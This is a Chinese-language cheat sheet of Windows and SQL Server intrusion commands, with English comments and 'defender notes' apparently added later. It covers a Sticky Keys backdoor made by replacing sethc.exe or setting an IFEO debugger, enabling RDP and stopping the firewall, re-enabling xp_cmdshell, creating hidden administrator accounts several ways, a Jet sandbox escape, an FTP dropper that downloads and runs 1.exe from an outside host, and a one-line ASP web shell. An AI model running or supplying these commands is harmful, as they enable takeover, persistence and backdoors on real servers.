query user 查看会话
logoff 踢人命令
5下shift后门
系统后门:
REM Overwrites the Sticky Keys accessibility binary (sethc.exe) and the copy under dllcache with explorer.exe,
REM then marks both files hidden. Labelled "system backdoor" above.
REM Defender note: file-integrity monitoring on sethc.exe (hash against the known-good binary) catches this;
REM the +h attribute only hides the file from a default directory listing and protects nothing.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
打开3389端口
REM Sets fDenyTSConnections=0 under Terminal Server, which is what the label above calls "opening 3389" (Remote Desktop enabled).
REM Defender note: alert on writes to this value on hosts that should not expose RDP; an unexpected change to 0 is a common post-compromise indicator.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
关闭系统防火墙
REM Stops the sharedaccess service (Windows Firewall / Internet Connection Sharing) and the policyagent service (IPsec Policy Agent), per the labels.
REM Defender note: service-stop events for these two services on a production host are worth an alert on their own.
net stop sharedaccess
net stop policyagent 关闭IPSC
SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问
-- Turns on the xp_cmdshell configuration option (show advanced options is needed to make it visible to sp_configure,
-- and is switched back off at the end). Each line is prefixed with ';' and suffixed with '--', the shape used when the
-- statement is appended to another query rather than run on its own.
-- Defender note: keep xp_cmdshell disabled, do not grant ALTER SETTINGS / sysadmin to application logins, and alert on the
-- "Configuration option 'xp_cmdshell' changed" informational message in the SQL Server error log.
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --
第一步执行:
-- Re-creates the system procedure sp_addextendedproc; the dated header suggests it was copied from the original
-- SQL Server source. The recipe runs it when the built-in procedure has been dropped (see "step 1" above).
--   @functname  (owner.)name of the extended procedure to register
--   @dllname    DLL that exports the function
-- Returns 1 after raising error 15002 when called inside an open transaction (@@trancount > 0),
-- otherwise registers the procedure with DBCC ADDEXTENDEDPROC and returns 0.
-- Defender note: dropping sp_addextendedproc is an old hardening step that is trivially undone by this definition;
-- restrict who can CREATE PROCEDURE in master and run DBCC instead of relying on the procedure being absent.
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
第二步执行
-- Step 2: registers xp_cmdshell from xplog70.dll using the procedure created above.
-- NOTE(review): the trailing "declare @o int" appears to be a paste remnant from the next snippet.
EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
直接加USER:
-- Adds a local administrator through OLE Automation (sp_OACreate / sp_OAMethod on WScript.Shell.Run)
-- instead of xp_cmdshell, so disabling xp_cmdshell alone does not stop it.
-- Defender note: keep the 'Ole Automation Procedures' configuration option at 0 and watch for EXECUTE grants
-- on sp_OACreate; a database service account spawning net.exe is a high-confidence alert.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'net user 123 123 /add & net localgroup administrators 123 /add'
SQL沙盒提权
-- "Sandbox escalation": xp_regwrite sets the Jet 4.0 engine's SandBoxMode to 0, after which OPENROWSET with
-- the Jet OLE DB provider (pointed at the IAS .mdb that ships with Windows) evaluates shell() inside the query.
-- Defender note: xp_regwrite must not be executable by application logins, 'Ad Hoc Distributed Queries' should stay
-- disabled, and any write to the Jet Engines\SandBoxMode value is itself a high-confidence indicator.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user admin$ 199181. /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators admin$ /add")');
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup Remote Desktop Users 123 /add")');
-----------------------------SQL语句--------------------------------------
修改SA密码:
-- sp_password takes the old password, the new password and an optional login name. The second call passes
-- NULL for the old password and targets 'sa', i.e. a reset without knowing the current one (possible for sysadmin).
-- Defender note: sp_password is deprecated; audit password changes on sa (ALTER LOGIN events) and prefer
-- disabling the sa login altogether.
Sp_password 'OldPassword','NewPassword'
sp_password Null,'199181','sa'
《防替换SHIFT》加属性
REM Marks both sethc.exe copies hidden, read-only and system so a plain copy does not overwrite them ("anti-replacement").
REM Defender note: attributes are not a protection; an administrator clears them with the block below. Use file-integrity monitoring instead.
attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
attrib c:\windows\system32\sethc.exe +h +r +s
《防替换》去属性
REM Reverse of the block above: clears hidden/read-only/system on both sethc.exe copies so they can be restored or replaced.
attrib c:\windows\system32\sethc.exe -h -r -s
attrib c:\windows\system32\dllcache\sethc.exe -h -r -s
shift后门:
%SystemRoot%\explorer.exe
查询分离器SHIFT:
-- Same sethc.exe replacement as the batch version, done from T-SQL through Scripting.FileSystemObject.CopyFile
-- (two separate automation objects, one per copy).
-- Defender note: the SQL Server service account has no business writing into system32; restrict its file-system
-- rights and alert on sp_OACreate use with 'scripting.filesystemobject'.
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe'
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'
WIN2000直接建立用户:
-- Creates a local account and adds it to Administrators via xp_cmdshell (labelled for Windows 2000).
-- Defender note: the $ suffix hides the account from some listings only; account-creation events on a database
-- host, especially from the SQL Server service, should be alerted on regardless of the name.
exec xp_cmdshell 'net user admin$ 199181 /add'
exec xp_cmdshell 'net localGroup Administrators admin$ /add'
启用用户:
REM Re-enables a disabled local account. Defender note: account-enabled events for unexpected accounts deserve review.
net user admin$ /active:yes
查看3389终端:
-- Reads the RDP listener port (PortNumber under WinStations\RDP-Tcp) through xp_regread.
-- Defender note: xp_regread is readable by more logins than xp_regwrite by default; review its permissions as well.
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
269998505
查看配置
systeminfo
劫持地址查看 boot.dat
-----------------------------SQL修复-----------------------------------------------
ipconfig :查看本地ip地址
type c:\boot.ini
解决127错误
第一步先删除:
-- "Fix error 127", step 1: drops sp_addextendedproc and sp_OACreate and unregisters xp_cmdshell so they can be
-- re-registered cleanly in step 2.
-- Defender note: these drops are the same commands used as a hardening step; on their own they do not prevent
-- re-registration (see the DBCC ADDEXTENDEDPROC lines below).
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第二步恢复:
-- Step 2: re-registers sp_OACreate (odsole70.dll) and xp_cmdshell (xplog70.dll) directly with DBCC ADDEXTENDEDPROC,
-- bypassing the sp_addextendedproc wrapper. Double-quoted identifiers depend on QUOTED_IDENTIFIER being OFF.
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
第一
-- Variant "first step": unregister xp_cmdshell only.
exec sp_dropextendedproc 'xp_cmdshell'
第二
-- Variant "second step": re-register xp_cmdshell using the DLL's full path under the instance's Binn directory,
-- then hide advanced options again.
dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0 --
查看系统属性
-- Reports SQL Server version and platform details (labelled "view system properties").
EXEC xp_msver
-- Writes c:\10.txt through Scripting.FileSystemObject.CreateTextFile: an FTP command script that logs in to a
-- remote host, downloads 1.exe in binary mode and quits; the lines after "bye" read like a follow-up command list
-- (run the file, exit) rather than FTP commands. @t is declared but never used.
-- Defender note: this is a dropper pattern. Alert on file creation by the SQL Server service account outside its
-- data directories and on outbound FTP from a database host; block outbound FTP at the egress firewall.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\10.txt', 10
exec @ret = sp_oamethod @f, 'writeline', NULL,'open xabc.3322.org'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'binary'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get 1.exe c:\1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
exec @ret = sp_oamethod @f, 'writeline', NULL,'1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'1.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'exit'
普通CMD后门
-- "Plain CMD backdoor": sets an Image File Execution Options Debugger for sethc.exe pointing at cmd.exe, so no file
-- on disk is replaced (the IFEO key does the redirection).
-- Defender note: monitor the IFEO subtree for Debugger values on sethc.exe and the other accessibility binaries;
-- the xp_regread line further down is the matching check and xp_regdeletekey the cleanup.
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'
SQL写一句话
-- Lists the subdirectories of the web root with xp_subdirs, then uses sp_makewebtask to write XX.asp containing
-- execute(request("SB")) — a one-line ASP web shell — into it.
-- Defender note: sp_makewebtask belongs to the legacy Web Assistant feature and is absent from recent versions;
-- on old instances revoke it. New .asp files appearing in a web root, written by the SQL Server service account,
-- should be alerted on.
exec master.dbo.xp_subdirs 'd:\web\cdlxkj';
exec sp_makewebtask 'd:\web\cdlxkj\XX.asp','select''<%execute(request("SB"))%>'' '
映像劫持
-- "Image hijack": same IFEO Debugger technique as above, written with named parameters and pointing sethc.EXE at explorer.exe.
-- Defender note: any Debugger value under Image File Execution Options for an accessibility binary is suspicious;
-- xp_regwrite should not be executable by application logins.
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
1.sql命令查询注册表粘滞键是否被劫持
-- Check (step 1): reads the IFEO Debugger value for sethc.exe; any value present means Sticky Keys is being redirected.
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
2.sql命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
-- Step 2: overwrites the IFEO Debugger for sethc.exe with taskmgr.exe (the label notes any executable could be used).
-- Defender note: overwriting rather than deleting the value leaves the redirection in place; step 3 below removes it.
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Debugger','REG_SZ','C:\WINDOWS\system32\taskmgr.exe'
3.sql命令删除注册表粘滞键的劫持功能，保护你的服务器不再被他人利用
-- Step 3 (cleanup): deletes the whole IFEO key for sethc.exe, removing the Debugger redirection.
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'
sql写文件〈写完后直接执行c:\1.vbs完成后建立user:test pass:1234〉
-- Writes c:\2.vbs through Scripting.FileSystemObject: a VBScript that uses the ADSI WinNT provider to create
-- user "test" with password "1234" and add it to Administrators (the label above says c:\1.vbs; the code writes 2.vbs).
-- @t is declared but never used.
-- Defender note: this avoids net.exe entirely, so detections keyed on net user / net localgroup miss it; watch for
-- script files created by the SQL Server service account and for ADSI-driven account creation.
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\2.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/test"'
无NET提权的脚本
' Creates a local user and adds it to Administrators via ADSI (WinNT provider), without net.exe.
' Usage (from the notes below): cscript user.vbs <username> <password>
' Defender note: net.exe-based detections do not see this; local account creation and Administrators group
' membership changes should be monitored at the event-log level regardless of the tool used.
struser=wscript.arguments(0)
strpass=wscript.arguments(1)
set lp=createObject("WSCRIPT.NETWORK")
' Bind to the local machine container.
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
' Create the account and commit it before re-binding to it.
Set od=ob.create("user",struser)
od.SetPassword strpass
od.SetInfo
Set of=GetObject(oz&"/" & struser & ",user")
oe.Add(of.ADsPath)
' Verify membership by scanning the group; the echoed strings are user-facing and left as written.
For Each admin in oe.Members
if struser=admin.Name then
Wscript.echo struser & " 建立成功!"
wscript.quit
end if
Next
Wscript.echo struser & " 用户建立失败!"
将以上保存为user.VBS文件
然后执行:cscript user.vbs 用户名 密码
1433无命令添加用户
用法很简单
扫到1433弱口令
net被禁止了的
把这个文件传到任何盘
然后输入命令"盘符+文件名+帐号+密码"
如 c:\en.exe jksing jksing
会自动添加到administrators组
type C:\boot.ini 系统
netstat -an 是查看服务器开放的端口
Ipconfig 本机IP ipconfig/all
net user admin 1985117 /add 这个就是添加管理员的dos口令，admin$是用户名后面加个$号
net localgroup administrators admin /add这是dos下提升管理的口令
net user 要删除的用户名 /del
regedit 打开注册表
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享)
net use c: /del 删除映射的c盘 net use * /del /y删除全部
net start telnet 启动 Telnet 服务
net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务)
net stop Messenger 停止信使服务(不会再有烦人的Win的弹出广告了)!
net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)
net user 得到本地主机的用户列表
开启XP&2003终端服务
REM Enables Terminal Services on XP/2003 (fDenyTSConnections=0); duplicate of the command near the top of the file.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
更改终端端口为20008(0x4E28)
REM Changes the RDP listening port to 0x4E28 (20008) in both places Windows reads it (rdpwd\Tds\tcp and WinStations\RDP-Tcp).
REM Defender note: a non-default RDP port is a common way to dodge port-based monitoring; alert on PortNumber changes and
REM inventory RDP by service, not by port.
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REM Adds a Windows Firewall (XP SP2 / 2003) exception for 3389/TCP from any address (the "*" scope) by writing the GloballyOpenPorts list directly.
REM Defender note: firewall policy written straight to the registry bypasses netsh logging; compare the effective firewall rule set against policy.
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5.开启Win2000的终端,端口为3389(需重启)
REM Builds 2000.reg line by line: a registry script that turns Terminal Services on for Windows 2000
REM (TSEnabled=1, TermDD and TermService set to auto-start) and pins the RDP port to 0xD3D (3389) in both port keys.
REM The netcache, ShutdownWithoutLogon, EnableAdminTSRemote and keyboard-toggle entries are written alongside; a reboot is required per the label.
REM Defender note: importing a .reg that flips TSEnabled / TermService Start is a loud change; audit those keys and the creation of .reg files in unusual places.
echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
REM Forces a reboot without shutdown.exe: writes a minimal restart.inf in %temp% and runs it through
REM rundll32 setupapi,InstallHinfSection with reboot flag 1. Works on 2000/2003 per the label.
REM Defender note: rundll32 setupapi with an .inf from %temp% is an uncommon parent/child pattern worth a detection rule.
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7.禁用TCP/IP端口筛选 (需重启)
REM Disables TCP/IP port filtering (EnableSecurityFilters=0); takes effect after a reboot per the label.
REM Defender note: alert on this value changing; it silently removes a host-level network control.
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8.终端超出最大连接数时可用下面的命令来连接
REM Connects to the console session, which does not count against the terminal connection limit ("ip" is a placeholder).
mstsc /v:ip:3389 /console
9.调整NTFS分区权限
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
首先开启三个服务
1.Server
2.Computer Browser
3.Workstation